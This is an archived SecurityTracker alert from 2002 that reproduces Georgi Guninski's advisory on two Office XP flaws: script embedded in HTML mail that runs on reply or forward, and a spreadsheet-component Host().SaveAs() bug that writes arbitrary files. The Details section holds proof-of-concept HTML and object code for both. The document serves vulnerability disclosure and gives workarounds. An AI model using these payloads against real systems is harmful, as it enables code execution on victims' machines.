SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Game)  >   Microsoft Office Vendors:   Microsoft
Microsoft Office XP Active Content Bug Lets Remote Users Cause Code to Be Executed on an Office User's Computer
SecurityTracker Alert ID:  1003932
SecurityTracker URL:  http://securitytracker.com/id/1003932
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 31 2002
Impact:   Execution of arbitrary code via network, Modification of system information, User access via network
Exploit Included:  Yes  
Version(s): Office XP
Description:   Two vulnerabilities were reported in Microsoft Office XP. A remote user can cause code to be executed on an Office user's computer with the full privileges of the Office user.

A remote user can reportedly embed active content (object + script) in an HTML-based e-mail message so that the code will be executed if the recipient chooses to reply to or forward the e-mail message. The code could reportedly be used to force the recipient to visit a malicious web page.

A vulnerability reportedly also exists in the Microsoft spreadsheet compenent of Office XP. A remote user can exploit a bug in the Host() function to create files on the system with arbitrary file names and with certain content. The content can reportedly be specified to an extent that is sufficient enough to place an executable file (.hta) in target (victim) user's startup directory. This allows the remote user to take full control of the target user's host when the computer is rebooted.

Some demonstration exploit code is provided in the Source Message.

The vendor has reportedly been notified.

Impact:   A remote user can send HTML-based e-mail that, when forwarded or replied to, will cause arbitrary scripting to be executed on the target user's computer. A remote user can send an Office XP document to a target user so that, when opened by the target user, will cause a file with specific contents and an arbitrary file name to be created on the target user's computer.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.microsoft.com/technet/security/ (Links to External Site)
Cause:   Access control error
Underlying OS:  Windows (XP)

Message History:   None.


 Source Message Contents

Subject:  More Office XP problems


Georgi Guninski security advisory #53, 2002

More Office XP problems

Systems affected:
Office XP

Risk: High
Date: 31 March 2002

Legal Notice:
This Advisory is Copyright (c) 2002 Georgi Guninski.
You may distribute it unmodified.
You may not modify it and distribute it or distribute parts
of it without the author's written permission.
If you link to this content use the URL:
http://www.guninski.com/m$oxp-2.html

Disclaimer:
The information in this advisory is believed to be true though
it may be false.
The opinions expressed in this advisory and program are my own and
not of any company. The usual standard disclaimer applies,
especially the fact that Georgi Guninski is not liable for any damages
caused by direct or  indirect use of the information or functionality
provided by this advisory or program. Georgi Guninski bears no
responsibility for content or misuse of this advisory or program or
any derivatives thereof.

Description:
Actually there are at least two vulnerabilities in Office XP.
1. It is possible to embed active content (object + script) in HTML mail
which is triggered if the user choses reply or forward to the mail.
This opens an exploit scenario for forcing the user to visit a page
in the internet zone of IE at least. For another exploit scenario
check (2)
2. There is a bug in ms spreadsheet compononent. Namely in its Host()
function which may be exploited with the help of (1) or probably from
any document opened with Office application. This buggy function
allows creating files with arbitrary names and their content may be
specified to some extent at which is sufficient to place an
executable file (.hta) in user's startup directory which may lead to
taking full control over user's computer.
This probably may be called cross application scripting because
one application uses object from another application.


Details:
The following must be put in HTML email which should be opened with
Outlook XP and the user should chose reply or forward.

1.
--------------------------------------
<OBJECT id=WebBrowser1 height=150 width=300
classid=CLSID:8856F961-340A-11D0-A96B-00C04FD705A2>
<PARAM NAME="ExtentX" VALUE="7938">
<PARAM NAME="ExtentY" VALUE="3969">
<PARAM NAME="ViewMode" VALUE="0">
<PARAM NAME="Offline" VALUE="0">
<PARAM NAME="Silent" VALUE="0">
<PARAM NAME="RegisterAsBrowser" VALUE="1">
<PARAM NAME="RegisterAsDropTarget" VALUE="1">
<PARAM NAME="AutoArrange" VALUE="0">
<PARAM NAME="NoClientEdge" VALUE="0">
<PARAM NAME="AlignLeft" VALUE="0">
<PARAM NAME="ViewID" VALUE="{0057D0E0-3573-11CF-AE69-08002B2E1262}">
<PARAM NAME="Location" VALUE="about:/dev/random&lt;script&gt;while (42) alert('HOHOHO\nTrying to sell trustworthy
computing\nHOHOHO')&lt;/script&gt;">
<PARAM NAME="ReadyState" VALUE="4">
</OBJECT>
-------------------------------------


2.
The office spreadsheet component is something like mini excel.
It may be embeded in web pages (seems not exploitable) and in
office documents (seems exploitable).
It supports the Host() function which returns the hosting object.
So if you put in formula '=Host().SaveAs("name")' file with name
shall be created.

[Note, lines may be wrapped]
---------------------------------------
<h1>
Hehe. Triyng to sell trustworthy computing.
</h1>
<object
     classid="CLSID:0002E551-0000-0000-C000-000000000046" id=Spreadsheet1
     v:shapes="_x0000_s1026" class=shape width=81 height=81
     u1:shapes="_x0000_s1025">
     <param name=DataType value=XMLURL>
     <param name=XMLData
     value="&lt;?xml version=&quot;1.0&quot;?&gt;&#13;&#10;&lt;ss:Workbook
xmlns:o=&quot;urn:schemas-microsoft-com:office:office&quot;&#13;&#10; xmlns:x=&quot;urn:schemas-microsoft-com:office:excel&quot;&#13;&#10;
xmlns:ss=&quot;urn:schemas-microsoft-com:office:spreadsheet&quot;&#13;&#10;
xmlns:c=&quot;urn:schemas-microsoft-com:office:component:spreadsheet&quot;&#13;&#10;
xmlns:html=&quot;http://www.w3.org/TR/REC-html40&quot;&gt;&#13;&#10; &lt;x:ExcelWorkbook&gt;&#13;&#10;
&lt;x:ProtectStructure&gt;False&lt;/x:ProtectStructure&gt;&#13;&#10;  &lt;x:ActiveSheet&gt;0&lt;/x:ActiveSheet&gt;&#13;&#10;
&lt;/x:ExcelWorkbook&gt;&#13;&#10; &lt;ss:Styles&gt;&#13;&#10;  &lt;ss:Style ss:ID=&quot;Default&quot;&gt;&#13;&#10;   &lt;ss:Alignment
ss:Horizontal=&quot;Automatic&quot; ss:Rotate=&quot;0.0&quot; ss:Vertical=&quot;Bottom&quot;&#13;&#10;
ss:ReadingOrder=&quot;Context&quot;/&gt;&#13;&#10;   &lt;ss:Borders&gt;&#13;&#10;   &lt;/ss:Borders&gt;&#13;&#10;   &lt;ss:Font
ss:FontName=&quot;Arial&quot; ss:Size=&quot;10&quot; ss:Color=&quot;Automatic&quot; ss:Bold=&quot;0&quot;&#13;&#10;
ss:Italic=&quot;0&quot; ss:Underline=&quot;None&quot;/&gt;&#13;&#10;   &lt;ss:Interior ss:Color=&quot;Automatic&quot;
ss:Pattern=&quot;None&quot;/&gt;&#13;&#10;   &lt;ss:NumberFormat ss:Format=&quot;General&quot;/&gt;&#13;&#10;   &lt;ss:Protection
ss:Protected=&quot;1&quot;/&gt;&#13;&#10;  &lt;/ss:Style&gt;&#13;&#10; &lt;/ss:Styles&gt;&#13;&#10; &lt;c:ComponentOptions&gt;&#13;&#10;
&lt;c:Label&gt;&#13;&#10;   &lt;c:Caption&gt;Microsoft Office Spreadsheet&lt;/c:Caption&gt;&#13;&#10;  &lt;/c:Label&gt;&#13;&#10;
&lt;c:PreventPropBrowser/&gt;&#13;&#10;  &lt;c:MaxHeight&gt;80%&lt;/c:MaxHeight&gt;&#13;&#10;
&lt;c:MaxWidth&gt;80%&lt;/c:MaxWidth&gt;&#13;&#10;  &lt;c:NextSheetNumber&gt;1&lt;/c:NextSheetNumber&gt;&#13;&#10;
&lt;/c:ComponentOptions&gt;&#13;&#10; &lt;x:WorkbookOptions&gt;&#13;&#10;  &lt;c:OWCVersion&gt;10.0.0.2621
&lt;/c:OWCVersion&gt;&#13;&#10;  &lt;x:DisableUndo/&gt;&#13;&#10; &lt;/x:WorkbookOptions&gt;&#13;&#10; &lt;ss:Worksheet
ss:Name=&quot;Sheet1&quot;&gt;&#13;&#10;  &lt;x:WorksheetOptions&gt;&#13;&#10;   &lt;x:Selected/&gt;&#13;&#10;
&lt;x:ViewableRange&gt;R1:R262144&lt;/x:ViewableRange&gt;&#13;&#10;   &lt;x:Selection&gt;R1C1&lt;/x:Selection&gt;&#13;&#10;
&lt;x:TopRowVisible&gt;0&lt;/x:TopRowVisible&gt;&#13;&#10;   &lt;x:LeftColumnVisible&gt;0&lt;/x:LeftColumnVisible&gt;&#13;&#10;
&lt;x:ProtectContents&gt;False&lt;/x:ProtectContents&gt;&#13;&#10;  &lt;/x:WorksheetOptions&gt;&#13;&#10;
&lt;c:WorksheetOptions&gt;&#13;&#10;  &lt;/c:WorksheetOptions&gt;&#13;&#10;  &lt;ss:Table ss:ExpandedColumnCount=&quot;1&quot;
ss:ExpandedRowCount=&quot;1&quot;&#13;&#10;   ss:DefaultColumnWidth=&quot;48.0&quot; ss:DefaultRowHeight=&quot;12.75&quot;&gt;&#13;&#10;
&lt;ss:Row&gt;&#13;&#10;    &lt;ss:Cell ss:Formula='=HOST().SaveAs(&quot;C:\GGGG5&quot;)'&gt;&#13;&#10;     &lt;ss:Data
ss:Type=&quot;Boolean&quot;&gt;1&lt;/ss:Data&gt;&#13;&#10;    &lt;/ss:Cell&gt;&#13;&#10;   &lt;/ss:Row&gt;&#13;&#10;
&lt;/ss:Table&gt;&#13;&#10; &lt;/ss:Worksheet&gt;&#13;&#10; &lt;ss:Worksheet ss:Name=&quot;Sheet2&quot;&gt;&#13;&#10;
&lt;x:WorksheetOptions&gt;&#13;&#10;   &lt;x:ViewableRange&gt;R1:R262144&lt;/x:ViewableRange&gt;&#13;&#10;
&lt;x:Selection&gt;R1C1&lt;/x:Selection&gt;&#13;&#10;   &lt;x:TopRowVisible&gt;0&lt;/x:TopRowVisible&gt;&#13;&#10;
&lt;x:LeftColumnVisible&gt;0&lt;/x:LeftColumnVisible&gt;&#13;&#10;   &lt;x:ProtectContents&gt;False&lt;/x:ProtectContents&gt;&#13;&#10;
&lt;/x:WorksheetOptions&gt;&#13;&#10;  &lt;c:WorksheetOptions&gt;&#13;&#10;  &lt;/c:WorksheetOptions&gt;&#13;&#10;
&lt;/ss:Worksheet&gt;&#13;&#10; &lt;ss:Worksheet ss:Name=&quot;Sheet3&quot;&gt;&#13;&#10;  &lt;x:WorksheetOptions&gt;&#13;&#10;
&lt;x:ViewableRange&gt;R1:R262144&lt;/x:ViewableRange&gt;&#13;&#10;   &lt;x:Selection&gt;R1C1&lt;/x:Selection&gt;&#13;&#10;
&lt;x:TopRowVisible&gt;0&lt;/x:TopRowVisible&gt;&#13;&#10;   &lt;x:LeftColumnVisible&gt;0&lt;/x:LeftColumnVisible&gt;&#13;&#10;
&lt;x:ProtectContents&gt;False&lt;/x:ProtectContents&gt;&#13;&#10;  &lt;/x:WorksheetOptions&gt;&#13;&#10;
&lt;c:WorksheetOptions&gt;&#13;&#10;  &lt;/c:WorksheetOptions&gt;&#13;&#10; &lt;/ss:Worksheet&gt;&#13;&#10;
&lt;o:DocumentProperties&gt;&#13;&#10;   &lt;o:Author&gt;ad&lt;/o:Author&gt;&#13;&#10;
&lt;o:LastAuthor&gt;ad&lt;/o:LastAuthor&gt;&#13;&#10;   &lt;o:Created&gt;2002-03-17T12:07:37Z&lt;/o:Created&gt;&#13;&#10;
&lt;o:Company&gt;g&lt;/o:Company&gt;&#13;&#10;   &lt;o:Version&gt;10.2625&lt;/o:Version&gt;&#13;&#10;
&lt;/o:DocumentProperties&gt;&#13;&#10;  &lt;o:OfficeDocumentSettings&gt;&#13;&#10;   &lt;o:DownloadComponents/&gt;&#13;&#10;
&lt;o:LocationOfComponents HRef=&quot;file:///E:\&quot;/&gt;&#13;&#10;
&lt;/o:OfficeDocumentSettings&gt;&#13;&#10;&lt;/ss:Workbook&gt;&#13;&#10;">
     <param name=AllowPropertyToolbox value=0>
     <param name=AutoFit value=0>
     <param name=Calculation value=-4105>
     <param name=Caption value="Microsoft Office Spreadsheet">
     <param name=DisplayColumnHeadings value=-1>
     <param name=DisplayGridlines value=-1>
     <param name=DisplayHorizontalScrollBar value=-1>
     <param name=DisplayOfficeLogo value=-1>
     <param name=DisplayPropertyToolbox value=0>
     <param name=DisplayRowHeadings value=-1>
     <param name=DisplayTitleBar value=0>
     <param name=DisplayToolbar value=-1>
     <param name=DisplayVerticalScrollBar value=-1>
     <param name=DisplayWorkbookTabs value=-1>
     <param name=EnableEvents value=-1>
     <param name=MaxHeight value="80%">
     <param name=MaxWidth value="80%">
     <param name=MoveAfterReturn value=-1>
     <param name=MoveAfterReturnDirection value=-4121>
     <param name=RightToLeft value=0>
     <param name=ScreenUpdating value=-1>
     <param name=EnableUndo value=0>
    </object>
---------------------------------

Workaround/Solution:
The solution is to get a real mail client and office applications.
Workaround for this particular problem is:
For (1) - disable everything that contains "active" in IE.
For (2) - (Have not tested it personally)
Deregister and delete the ms office spreadsheet component

Vendor status:

Microsoft was notified on 17 March 2002.
They had 2 weeks to produce a patch but didn't.

Regards,
Georgi Guninski
http://www.guninski.com






----------------------
You may visit Guninski Security Mailing List page at
http://www.guninski.com/mailinglist.html
----------------------


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC